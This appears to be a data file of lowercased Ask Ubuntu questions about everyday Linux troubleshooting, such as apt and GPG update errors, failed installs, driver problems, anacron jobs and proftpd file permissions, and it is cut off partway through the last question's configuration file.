358727	xubuntu software update not working ?	when running a software update , i got a message telling me that either my network connections are n't working anymore , or that the repositories are no longer available . i already tried restarting my computer and running the software updater from the settings panel . i am running xubuntu 13.04 . software uupdate has worked in the past . sudo apt-get update gives me the following output : ( i had to take out the big chunk of links because i am not allowed to post more than 2 links ) ign cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring release.gpg ign cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring release err cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/main amd64 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/multiverse amd64 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/restricted amd64 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/universe amd64 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/main i386 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/multiverse i386 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/restricted i386 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/universe i386 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms ign cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/main translation-en_us ign cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/main translation-en ign cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/multiverse translation-en_us ign cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/multiverse translation-en ign cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/restricted translation-en_us ign cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/restricted translation-en ign cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/universe translation-en_us ign cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) raring/universe translation-en -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- fetched 950 kb in 10s ( 88.0 kb/s ) w : gpg error : http : //download.opensuse.org release : the following signatures could n't be verified because the public key is not available : no_pubkey 977c43a8ba684223 w : failed to fetch cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) /dists/raring/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) /dists/raring/multiverse/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) /dists/raring/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) /dists/raring/universe/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) /dists/raring/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) /dists/raring/multiverse/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) /dists/raring/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //xubuntu 13.04 _raring ringtail_ - release amd64 ( 20130423.1 ) /dists/raring/universe/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead .
358730	when i enter the command 'sudo do-release-upgrade ' into terminal , the response is : 'no new release found '	i have ubuntu 12.04 on my computer . i found a command line that would update my software , but it did not work . when i entered : sudo do-release-upgrade into terminal , it asked me for my password , it checked for an update , and said no new release found . this deeply frustrates me because i know there is an update . please help before i smash my laptop to tiny bits .
358733	install off usb successful after restart usb tries install again	so the install along side windows8 went fine off a usb , i was then told to restart the computer , still booting off the usb , but it just gives me the install menu again . if i change the bios boot off windows boot manager it , not surprisingly boots windows8 . how do i get ubuntu to start ?
358735	ubuntu 10.04lts ( lucid lynx ) - hard disk back up	i am using ubuntu 10.04lts ( lucid lynx ) and have a 250 gb hard disk ( ata toshiba mk2555gsx ) . it is mounted on a single device /dev/sda and use master boot record partitioning . when i am doing s.m.a.r.t . data and running self-test ( through system â administration â disk utility ) , i am getting smart status : disk has a few bad sectors . i have been digging through the errors and most of the sites suggested to back up the drive and if possible re-format . since i have an external hard drive for back up and have bad sectors in my hard disk , i want to know if file back up would be the ideal choice rather than disk imaging , file synchronization or other back up choices . i am confused about the exact procedure that i follow without corrupting the back up and ensuring safe restore . can anybody suggest me the safest and fast-restoring back up method that is available ? please note that i have several apps installed including hadoop , hive , hbase , python numpy , scipy and matplotlib packages . i need to reuse them after restore from back up . any quick suggestion will be highly appreciated . note : also , it has happened that when i am trying to restart my linux , i am getting reallocated sector count normalized : 100 worst : 100 threshold : 10 value : 1 sector current pending sector count normalized : 100 worst : 100 threshold : 0 value : 3 sectors when i am restarting my system i am getting the following message : fsck from util-linux-ng 2.17.2 thanks
358739	inter paragraph space in libreoffice-writer	i have a pretty ordinary document where i see different spacing between different paragraphs ( the some paragraphs are separated by extra space , some are not ) . i can not figure out where this is set . i tried the following : select the neighboring paragraphs and right click mouse , select `` line spacing '' - it is always single , whether there is extra inter-paragraph space or not . format - > paragraph - > indent & spacing : spacing both below and above paragraphs is empty , line spacing is single . my question is : how do i make all my paragraphs the same style ( i.e. , i want uniform inter-paragraph space in the whole document ) .
358741	how to update my already installed ubuntu touch image ?	i noticed today that when i opened the update manager through the system settings in ubuntu touch running on nexus 7 , it showed no updates . but the i ran the following two commands in the terminal : sudo apt-get update sudo apt-get dist-upgrade certain updates started getting downloaded , and upon my consent , they were installed . why is this so ? why does n't the over the air updates facility show the updates ? i am running the latest daily build image of ubuntu touch .
358742	blank screen and windows being `` pasted ? '' after unity login	here 's what happens . 1 : boot up into ubuntu . nothing out of the ordinary . 2 : login to ubuntu desktop , accepts password . wallpaper displays as normal . 3 : password is accepted , wallpaper stays for ~1/2 second before it turns into a black screen . unity , at first , seems normal otherwise . 4 : all windows open , closed , or moved get these stamps on the background . they are in order of use . they seem fine inside the application ( i 'm on firefox right now ) . here 's a picture of what it looks like : http : //i.imgur.com/58nntoi.png i have tried starting the x server in ctrl-alt-f2 , rebooting , purging and installing ubuntu-desktop ( reinstall refers to purging then reinstalling from now on . ) reinstalled gnome-shell , and reinstalled xserver-xorg . any ideas ? i think i 'm just missing the proper google search term .
358743	how can i change unity greeter sound theme ?	i ca n't say i 'm a fan of canonical 's taste in sounds and wallpapers ... ( but i am a fan of clean methods for tweaking - as opposed to overwriting the original files ) thankfully , as of 13.04 , custom wallpapers still seem pretty easy to use . setting sounds got trickier a few versions ago , but it 's still fairly straightforward too ( see this tutorial for sound theme creation , but answer for installation ) i even negotiated the astonishingly unfriendly process of a wallpaper/settings change for unity greeter ! ( granting lightdm x privileges as per this answer , but using the graphical dconf-editor instead of gsettings - example below ) but ... the system ready drums ( fluteflute slap ? ) are unchanged by assigning lightdm the custom sound theme . the dconf-editor method works for wallpapers and the custom sound theme works for my user - so why does unity greeter not respect lightdm 's sound theme ? is system-ready.ogg played by a different user ? is unity greeter just broken in this respect ? i do n't want to just substitute the file in the ubuntu sound theme , but i ca n't see how to make the system respect the setting . user @ box : ~ $ sudo -i root @ box : ~ # xhost +si : localuser : lightdm root @ box : ~ # su lightdm -s /bin/bash lightdm @ box : /root $ dconf-editor # ( change settings various ) lightdm @ box : /root $ exit root @ box : ~ # xhost -si : localuser : lightdm root @ box : ~ # exit
358749	how to install 13.04 after download ?	i downloaded 13.04 which took me a couple of hours . i ca n't tell which file to select to begin the installation . please let me know what to do next .
358753	can i install on ubuntu on lenovo ideapad yoga ?	it is running on a nvidia tegra 3 processor .
358755	broadcom 4311 driver issues	-hi , i am looking for help with installing the correct drivers for a broadcom 4311 nic . i am using ubuntu 13.04 on a dell vostro 1500 and this has been terribly frustrating . i have installed ubuntu on three other dell 's , two of which i had to import drivers via sd , all with broadcom nics . i have never been so stumped . -the major issue for me is trying to install driver/firmware with no eth or wifi to the laptop in question . i have tried to install the sta proprietary driver = no luck , tried the bcmwl driver = no luck ' also tried installing b43-fwcutter/firmware-b43-installer and these wo n't install due to error during installation requires version ( > = 015-14.1 ) . downloaded the required version and still get error message . i have followed several different posts that have variations of installing the drivers . overall its becoming very irritating with all the different forums on this subject and i would like to hear what some of the people from the community think . please help !
358761	how do i instal ubuntu in my lg gm360i phone ? or it is possibile to install	i 'm very much interested to install ubuntu in my phone.my current phone is running in java os.so i do n't know whether my phone supports or not.it 's internal memory is 60mb and external memory is extendable up to 16gb .
358764	installing haskell platform from source on ubuntu 13.04 : ca n't find opengl	i 'm attempting to install haskell platform 2013.2.0.0 on a fairly fresh ubuntu 13.04 , using the instructions here : http : //askubuntu.com/questions/286764/how-to-install-haskell-platform-for-ubuntu-13-04 i 've installed the extra packages mentioned in the comments , but the configure step generates an error related to opengl not being found . here it is : > ./configure # omitting some output # ... checking for zlibversion in -lz ... yes checking gl/gl.h usability ... yes checking gl/gl.h presence ... yes checking for gl/gl.h ... yes checking for library containing glend ... no configure : error : the opengl c library is required strangely , it can find the opengl headers , but it ca n't find glend . any idea what could be causing this ?
358767	nvidia graphics card is messing up audio	hello i am using an nvidia geforce 210 graphics card , and my sound is not working . when i go to sound , it does n't show my headset as an output or input , and it does n't work . i 'm using the 319 drivers . i have my headset plugged in the back jacks , but they do n't work in the front jacks either , but when i put in my old graphics card ( ati radeon or something ) sound works perfectly . any suggestions would be hugely appreciated .
358771	error launching zte modem ac2787 ?	i get this error when i run `` wvdial mts '' : -- > wvdial : internet dialer version 1.61 -- > initializing modem . -- > sending : zte -- > sending : atq0 atq0 ok -- > re-sending : zte -- > modem not responding . what could probably be the problem ? ?
358772	how to install ubuntu for android ?	i want to add ubuntu alongside with my android os , how can i do so , i ca n't find a ubuntu package for the android device . i have a lenovo p770 android device with me .
358775	universal usb installer not making a working drive	using universal usb installer i install 13.04 that i downloaded from the website , and there are no problems . but when i restart my computer , it says no os found and loads windows normally .
358780	is steam os based on ubuntu ?	in the article , it says that steamos is based on ubuntu . is this true ? and if so , does this mean that steam 's entire library will be available on ubuntu ? sorry , slightly off-topic . article link
358781	distorted screen on startup and installation	i have encountered a very weird problem while installing and using linux on my hp pavillion dv6000 laptop . i get a distorted screen when i try to install ubuntu on my linux . the screen is divided into three parts and the windows ( for ex : window for install option , terminal etc ) are also divided into three parts . but the problem got resolved when connected external monitor to my laptop . i think there is some problem in my graphics card or laptop screen it is not able to adjust its resolution on its own ... . but when i connect my monitor , both my monitor and laptop screen work perfectly fine . what is this problem and how should i resolve it ? and now , every time i want to boot into linux , first i have to connect my monitor to get my laptop screen working right . please i need a solution .
358782	suspend problems dell xps 15 - ubuntu 13.04	i have a dell xps 15 laptop with an external display through the mini-displayport , and i am completely unable to get the suspend functionality working correctly with ubuntu 13.04 raring ringtail . with any of the 3.8 kernels , suspending the computer seems to work correctly for about a half second , and then the fan starts up to full blast , and the activity light stays on ( instead of the slow blink that indicates sleep mode ) . with 3.9 , i can initiate suspend correctly , but the laptop only displays a blank screen upon resume . the 3.10 kernel suspends and resumes correctly except for the mini-displayport crashing . my external monitor goes into power saving mode after the computer wakes up from suspend and stays that way until i restart the computer , even after restarting lightdm . 3.11 encounters other errors when resuming . this is getting extremely frustrating . any help or insight would be much appreciated . thanks !
358785	how to run command on connect to network	how can i automatically run a command whenever my computer connects to a network ? i want it to run in these situations : on power on and login to unity on waking up from suspend or hibernate when it connects to a network after disconnection i first tried the /etc/pm/sleep.d/ for suspend and hibernate , but they run before computer connects to the network and because my command is a transaction in the network , it does n't work at all . i even tried applying `` sleep 10 '' to the first of command , but it caused 10 second of delay before connecting to the network .
358786	why does distro matter ?	from my understanding of linux , all distros are are just a bunch of pre-packaged packages . in theory , could n't i start with ubuntu and eventually turn it into something similar to # ! only by installing/uninstalling packages ? the reason i ask is that i 'm new to linux . i 'm looking to pick a distribution that i can use for both my desktop and laptop . i like the way it looks , but some people have told me that if you do n't know exactly what you need/want to pick ubuntu . however , i 've been looking at the posts here and a lot of the screen shots that i like are arch/ # ! . i 'm willing to do a bunch of research , and i feel that i might even learn to use linux better with something other than ubuntu ? any input ?
358788	how do i install a specific video codec in ubuntu ?	before you ask , yes , i 've installed medibuntu . this codec is not in that pack -- specifically i am trying to install scls.dll , which stands for screen capture lossless codec , a codec that works with camstudio 's desktop recording software . it works fine in windows , but when i have attempted to install it on linux , i have had zero luck through ubuntu itself , or through wine . when i install through wine , gom player simply crashes and windows media player wo n't load the files at all -- those are the only two media players i know of that have correctly made use of the scls codec in windows -- and in ubuntu , the `` videos '' program ca n't find it -- so i suppose the second part of my question would be how to direct the `` videos '' program to my codec ?
358789	does the normal ubuntu desktop 12.04.03 have a feature to partition the disk ?	the installation guides seem creepy . they never tell what is there in the advanced section of the live cd . i want to format a partition as ext4fs or lower and then install ubuntu . or perhaps install ubuntu in a different partition than that of windoze . will the ubuntu 12.04.03 cd desktop allow me to do that ? p.s : and no , i ca n't download the alternate cd
358793	simple scan and ia32-libs not working	in xu13.10amd64 simple-scan does not work . it used to work in other versions . fragmentation error shows if program is run in terminal . the other think , stopping other software from working is ia32-libs missing in 64bit distro ... please advise .
358795	python.h : no such file or directory # include < python.h >	when trying to compile pyqt i have an error i have installed all the prerequistes but its still showing the same problem please find an answer for this
358796	wifi driver intel centrino problem	i am having intel centrino wireless n 2230 card which i have trying to install through iwlwifi*.tar and then copying .ucode to firmware and then running modprobe twice but it wasnt available even i rfkill unblock all or by making ifconfig wlan0 up , pressing the wifi buttons etc it didnt work . i also updated the compat-wireless drivers but still all in vain ... i also rebooted my pc for the above to work but it didnt ... . i have been doing this for the last many days but i m not able to make my wifi work ... . i m using hp pavillion m6 , which is having intel centrino n-2230 wireless card . if anyone can help please do email me . thankyou .
358802	codeigniter installtion	recently i install codeigniter 2.1.3 using the instruction of codeigniter installation . installation process process works well because http : //localhost/codeigniter link works . now my problem is that i can not change any code or add new file . then i change the file permission usingsudo chmod 777 -r codeigniter , then file permission change as i think , but still no result . only i can modify the code using : : sudo -s cd /opt/lampp/htdocs/codeigniter/config gedit autoload.php any suggestion ?
358805	asus v550cb any good for ubuntu ?	original post got mark as duplicate . when it was not . then linked to what are the system requirements for each flavor of ubuntu desktop ? . which only answered some what of the question . so i thought i would re-word it . i was wondering if anyone out there has a asus v550cb and is running ubuntu ? is the notebook good quality ? is the notebook user friendly to ubuntu ? does everything work under ubuntu ? ( mainly the touch screen . ) ( pervious question . ) i was wondering if someone could help me find out how compatible the asus v550cb hardware would be to run ubuntu ? would i need to install 13.04 or could i stick to 12.04 ? as there is a touch screen . any help would be greatly appreciated !
358808	ubuntu 13.04 install inside widows not working	i am trying to install ubuntu 13.04 alongside windows 7 using wubi.exe . when i am trying to install it asks for location and password details . then it shows a screen `` downloading ubuntu-13.04-desktop-amd64.torrent '' this is where i got stuck . once it completed downloading , again it starts from beginning . i downloaded the iso once again to check whether my data is corrupted but still no use . could anyone help on this problem ?
358810	internet worked during install , but not after	i installed ubuntu 13.10 beta 2 on my asus g55v and during install the internet ( wireless ) connected perfectly fine and downloaded updates . after install , it was connected for a couple seconds until saying `` disconnected '' it was still being recognized , but it would not connect . i then looked online and seen people saying to add/remove things in /etc/network/interfaces but i ended up screwing it up some more . i also ended up removing network manager as a whole as described online . how do i get the internet working again ? neither wireless or ethernet work .
358811	upon installing ubuntu 13.04 , `` acpid : exiting ''	i tried to install ubuntu 13.04 from dvd . i choose to install it alongside window 7 . the dvd was it self ejected and i got a black screen and acpid : exiting was written on upper right corner . how can i fix it , to install ubuntu 13.04
358813	why my weekly anacron job is not executed ?	i 'd like to use anacron for a weekly job on ubuntu 13.04 . here 's my /etc/crontab : # /etc/crontab : system-wide crontab # unlike any other crontab you do n't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d . these files also have username fields , # that none of the other crontabs do . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 5 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) # here 's my /etc/anacrontab : # /etc/anacrontab : configuration file for anacron # see anacron ( 8 ) and anacrontab ( 5 ) for details . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin home=/root logname=root # these replace cron 's entries 1 5 cron.daily run-parts -- report /etc/cron.daily 7 10 cron.weekly run-parts -- report /etc/cron.weekly @ monthly 15 cron.monthly run-parts -- report /etc/cron.monthly here 's my /etc/cron.weekly/0anacron : # ! /bin/sh # # anacron 's cron script # # this script updates anacron time stamps . it is called through run-parts # either by anacron itself or by cron . # # the script is called `` 0anacron '' to assure that it will be executed # _before_ all other scripts . test -x /usr/sbin/anacron || exit 0 anacron -u cron.weekly and finally here 's the script i put in /etc/cron.weekly/ : # ! /bin/sh curlftpfs -o allow_other , skip_pasv_ip mauro-casa.no-ip.org:21001/volume_1/foto/marta/ /home/mauro/pubblici/marta_nas/ sleep 5 rsync -rlt -- update -- ignore-existing -- size-only -- exclude=.picasaoriginals/* -- exclude=.picasaoriginals -- exclude=.directory -- exclude=.dropbox -- exclude=picasa.ini -- temp-dir=/home/mauro/.rsync-temp/ /home/mauro/dropbox/marta/ /home/mauro/pubblici/marta_nas/ umount -l /home/mauro/pubblici/marta_nas/ the script is obviously chmoded +x , and it works perfectly if executed manually ( as sudo ) . could anyone help ? edit # 1 as requested , here 's output of cat /var/log/cron.log | grep `` oct 13 '' oct 13 08:29:05 mauro-alienware anacron [ 1315 ] : anacron 2.3 started on 2013-10-13 oct 13 08:29:05 mauro-alienware cron [ 1266 ] : ( cron ) info ( pidfile fd = 3 ) oct 13 08:29:05 mauro-alienware cron [ 1403 ] : ( cron ) startup ( fork ok ) oct 13 08:29:05 mauro-alienware cron [ 1403 ] : ( cron ) info ( running @ reboot jobs ) oct 13 08:29:06 mauro-alienware anacron [ 1315 ] : will run job `cron.daily ' in 5 min . oct 13 08:29:06 mauro-alienware anacron [ 1315 ] : jobs will be executed sequentially oct 13 08:34:05 mauro-alienware anacron [ 1315 ] : job `cron.daily ' started oct 13 08:34:05 mauro-alienware anacron [ 1651 ] : updated timestamp for job `cron.daily ' to 2013-10-13 it seems no logs for cron.weekly is showed . instead , here 's an extract from cat /var/log/cron.log.1 | grep `` oct 11 '' output : oct 11 06:47:01 mauro-alienware cron [ 12553 ] : ( root ) cmd ( test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) ) oct 11 06:59:11 mauro-alienware anacron [ 5125 ] : anacron 2.3 started on 2013-10-11 oct 11 06:59:11 mauro-alienware anacron [ 5125 ] : normal exit ( 0 jobs run ) oct 11 07:45:54 mauro-alienware anacron [ 5444 ] : anacron 2.3 started on 2013-10-11 oct 11 07:45:54 mauro-alienware anacron [ 5444 ] : normal exit ( 0 jobs run ) oct 11 07:46:39 mauro-alienware cron [ 9156 ] : ( root ) cmd ( start -q anacron || : ) oct 11 07:46:39 mauro-alienware anacron [ 9159 ] : anacron 2.3 started on 2013-10-11 oct 11 07:46:39 mauro-alienware anacron [ 9159 ] : normal exit ( 0 jobs run ) oct 11 08:46:31 mauro-alienware cron [ 1249 ] : ( cron ) info ( pidfile fd = 3 ) oct 11 08:46:31 mauro-alienware cron [ 1308 ] : ( cron ) startup ( fork ok ) oct 11 08:46:31 mauro-alienware cron [ 1308 ] : ( cron ) info ( running @ reboot jobs ) oct 11 08:46:31 mauro-alienware anacron [ 1303 ] : anacron 2.3 started on 2013-10-11 oct 11 08:46:31 mauro-alienware anacron [ 1303 ] : normal exit ( 0 jobs run ) oct 11 08:46:35 mauro-alienware anacron [ 1839 ] : anacron 2.3 started on 2013-10-11 oct 11 08:46:35 mauro-alienware anacron [ 1839 ] : normal exit ( 0 jobs run ) oct 11 08:46:37 mauro-alienware anacron [ 4700 ] : anacron 2.3 started on 2013-10-11 oct 11 08:46:37 mauro-alienware anacron [ 4700 ] : normal exit ( 0 jobs run )
358818	i 'm getting a gpg error	i 'm getting a gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 5a9a06aef9c8db0 this came after doing sudo apt-get-repository ppa : ok2cqr/ppa sudo apt-get update the error happened after a long list of 'hit http ca n't copy/paste from the ubuntu laptop to here , a mac desktop with a better wifi connection , but at the time i seemed to have a reliable connection . thanks scott
358819	brightness settings not working on aspire e1-571g	when i try to adjust the brightness bar in 'brightness & lock ' in system settings . there is absolutely no change . is there some other way that i can configure my screen brightness other than in brightness and lock setting ?
358820	after joining ubuntu to windows active directory domain , it always complain as password expired , why ?	i 've successfully joined my workstations ( ubuntu 12.04 ) to windows server ad using likewise open . when i create a user on the windows server and tick ‘user must change password at next logon’ it 's successfully done . the problem is when i try to log in on a workstation and it says 'password expired ' and i need to create a new password but it always fails .
358821	postgrey does not show up via netstat - where is it ?	after an system update/upgrade my incoming mail stopped working ( `` warning : connect to 127.0.0.1:10023 : connection refused '' ) . okay - no problem , i thought , hit google and found that the protocol has changed from ipv4 to ipv6 ( http : //www.serenux.com/2013/01/howto-fix-postgrey-not-working-after-upgrading-from-an-older-version-of-ubuntu-to-a-newer-version/ ) . but changing the protocol in postfix 's main.cf did not solve the problem . finally i came closer . it seems the service is not running at all : ~ # service postgrey start [ ok ] starting postfix greylisting daemon : postgrey . root @ vmd1989 : ~ # netstat | grep postgrey root @ vmd1989 : ~ # ps aux | grep postgrey root 23611 0.0 0.0 10352 920 pts/0 s+ 09:07 0:00 grep postgrey the point is : starting the service seems to work ( first two lines ) and there is no error in the syslog ( except for the mail errors `` warning : connect to : :1:10023 : connection refused '' ) . now i am slightly stuck ... where can i search to get closer to a solution ? thanks
358829	dependencies problem for chromium	chromium-browser : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libudev0 ( > = 147 ) but 175-0ubuntu9.4 is to be installed depends : libx11-6 ( > = 2:1.4.99.1 ) but 2:1.4.99.1-0ubuntu2.1 is to be installed depends : libxcomposite1 ( > = 1:0.3-1 ) but 1:0.4.3-2build1 is to be installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-2build1 is to be installed depends : libxrandr2 ( > = 2:1.2.0 ) but 2:1.3.2-2ubuntu0.2 is to be installed depends : libxss1 but it is not going to be installed these are problems coming in installations any suggestions how to solve them ?
358830	higher dispay resolution than nativ possible	i have an old plasma display with the highest resolution of 1024x768 . cause this is 4/3 and not 16/9 i want to emulate 1280x720 and then scale it to 1024/768 , so i can strech it width the plasma display to fit to the screen . i'v tried hard width xrandr , but i ca n't make it . i would be soo glad , if you could help me : ) ) cheer nils
358831	which version of catalyst amd graphics driver will be default in ubuntu 13.10	could it be 13.11 ? it is important becouse older version does not work with my graphics and unity .
358834	desktop icons settings reset at every boot	i 'm running ubuntu 13.04 , and i 'm having problems with the desktop icons : after every boot desktop icon setting are reset and `` computer '' , home folder and trash icons are shown on the desktop . if i open ubuntu tweak and try to change settings , they are ignored ; doing a logout/login results in some cases in the correct settings being applied , but after a reboot , everything is back to the initial default settings . i tried resetting both unity and compiz , i tried changing setting with gnome-tweak-tool , but nothing fixed this issue . any idea of what might be wrong ?
358835	what are the risks / advantages of working with a mainline kernel ?	i 'm currently on ubuntu 13.04 . it 's using 3.8 kernel . is it possible to install 3.11.5 kernel downloaded from the website www.kernel.org what is the improvement in such new kernel ? is there a easy guide if i need to update ? i 'm a newbie . so , please bare if i asked a silly question .
358836	set up a dual screen with my laptop ubuntu 12.04 using acer	hello this is my first post and i would like to set up a dual screen ( with my laptop ) using ubuntu 12.04 lts . here are my specs of the laptop and graphics card that it comes with ... aspire acer v3-551-8887 ; amd radeon hd 7640g with 512 mb graphics system memory so it detects the screen but once i click to set up the dual screen i get this error msg requested position/size for crtc 147 is outside the allowed limit : position= ( 1280,0 ) , size ( 1280,768 ) , maxumum= ( 1600,1600 ) . i really do n't know what this means at all . can someone explain what this means ? my goal is to set up another monitor to have two screens . ( monitor acer 21 ' ) any help will be appreciated . thanks in advance .
358837	installing kingsoft on 13.10	i am trying to install kingsoft in 13.10 . however , a32-libs multi arch support is not longer available . what do i need to install to run kingsoft . i have kingsoft installed , but it will not start without 32bit support .
358838	how good is the wubi ?	does the wubi allow you to create a proper ext4 partition and install ubuntu ? or is it that the wubi will only allow me to install it in the c partition ?
358840	wacom ctl 480s on ubuntu	does the wacom ctl-480s work on ubuntu ? it is my first tablet on ubuntu and i do n't know what i should do . also , could someone tell me which version of ubuntu is the best for my wacom ?
358841	ubuntu 13.10 jgrasp unable to compile due to javac error	i am fairly new to linux and ubuntu . i have download jgrasp and installed all the necessary jdk packages . however when i try to compile a jgrasp program i get an error saying that javac is not in the folder i am saving the file in . any ideas ?
358842	proftpd - uploaded files getting 600 permissions	we have an ubuntu 12.04 server , and have proftpd setup on there for some users to upload files . each user is jailed to their own directory . new directories get 777 permissions , and new files get 666 permissions . this is fine and works for us in almost all cases , but occasionally , we get files uploaded with 600 permissions ( unreadable to anything but the owner ) , which causes a problem when our php web application tries to read the files and ca n't . is it possible for the permissions to somehow get set to 600 when they 're being created/uploaded ? i.e - are there any cases where proftpd will give the file lower permissions for some reason ? or does it have to be the user setting these permissions manually ? and is there a way of us setting the permissions and locking them ? we just need read access publicly , but still allow the owner to delete the files if they want . i 'll paste the entire config file below from /etc/proftpd/proftpd.conf , although weirdly , it seems to be getting ignored at the moment because the umask is n't having any impact . # # /etc/proftpd/proftpd.conf -- this is a basic proftpd configuration file . # to really apply changes , reload proftpd after modifications , if # it runs in daemon mode . it is not required in inetd/xinetd mode . # # includes dso modules include /etc/proftpd/modules.conf # set off to disable ipv6 support which is annoying on ipv4 only boxes . useipv6 on # if set on you can experience a longer connection delay in many cases . identlookups off servername `` debian '' servertype standalone deferwelcome off multilinerfc2228 on defaultserver on showsymlinks on timeoutnotransfer 600 timeoutstalled 600 timeoutidle 1200 displaylogin welcome.msg displaychdir .message true listoptions `` -l '' denyfilter \* . */ # use this to jail all users in their homes defaultroot /ftp # users require a valid shell listed in /etc/shells to login . # use this directive to release that constrain . # requirevalidshell off # port 21 is the standard ftp port . port 21 # in some cases you have to specify passive ports range to by-pass # firewall limitations . ephemeral ports can be used for that , but # feel free to use a more narrow range . # passiveports 49152 65534 # if your host was natted , this option is useful in order to # allow passive tranfers to work . you have to use your public # address and opening the passive ports used on your firewall as well . # masqueradeaddress 1.2.3.4 # this is useful for masquerading address with dynamic ips : # refresh any configured masqueradeaddress directives every 8 hours < ifmodule mod_dynmasq.c > # dynmasqrefresh 28800 < /ifmodule > # to prevent dos attacks , set the maximum number of child processes # to 30 . if you need to allow more than 30 concurrent connections # at once , simply increase this value . note that this only works # in standalone mode , in inetd mode you should use an inetd server # that allows you to limit maximum number of processes per service # ( such as xinetd ) maxinstances 30 # set the user and group that the server normally runs at . user proftpd group nogroup # umask 022 is a good standard umask to prevent new files and dirs # ( second parm ) from being group and world writable . umask 022 022 # normally , we want files to be overwriteable . allowoverwrite on # uncomment this if you are using nis or ldap via nss to retrieve passwords : # persistentpasswd off # this is required to use both pam-based authentication and local passwords # authorder mod_auth_pam.c* mod_auth_unix.c # be warned : use of this directive impacts cpu average load ! # uncomment this if you like to see progress and transfer rate with ftpwho # in downloads . that is not needed for uploads rates . # # usesendfile off transferlog /var/log/proftpd/xferlog systemlog /var/log/proftpd/proftpd.log # logging onto /var/log/lastlog is enabled but set to off by default # uselastlog on # in order to keep log file dates consistent after chroot , use timezone info # from /etc/localtime . if this is not set , and proftpd is configured to # chroot ( e.g . defaultroot or < anonymous > ) , it will use the non-daylight # savings timezone regardless of whether dst is in effect . # setenv tz : /etc/localtime # allow resume uploads and downloads allowstorerestart on allowretrieverestart on < ifmodule mod_quotatab.c > quotaengine off < /ifmodule > < ifmodule mod_ratio.c > ratios off < /ifmodule > # delay 